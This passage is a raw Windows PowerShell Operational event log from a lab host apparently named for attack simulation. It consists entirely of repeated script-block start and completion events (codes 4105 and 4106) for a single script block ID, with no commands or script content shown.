Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468861
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468860
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468859
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468858
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468857
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468856
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468855
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468854
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468853
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468852
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468851
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468850
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468849
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468848
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468847
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468846
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468845
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468844
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468843
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468842
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468841
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468840
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468839
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468838
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468837
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468836
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468835
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468834
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468833
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468832
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468831
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468830
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468829
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468828
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468827
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468826
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468825
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468824
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468823
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468822
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468821
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468820
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468819
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468818
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468817
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468816
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468815
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468814
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468813
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468812
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468811
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468810
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468809
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468808
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468807
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
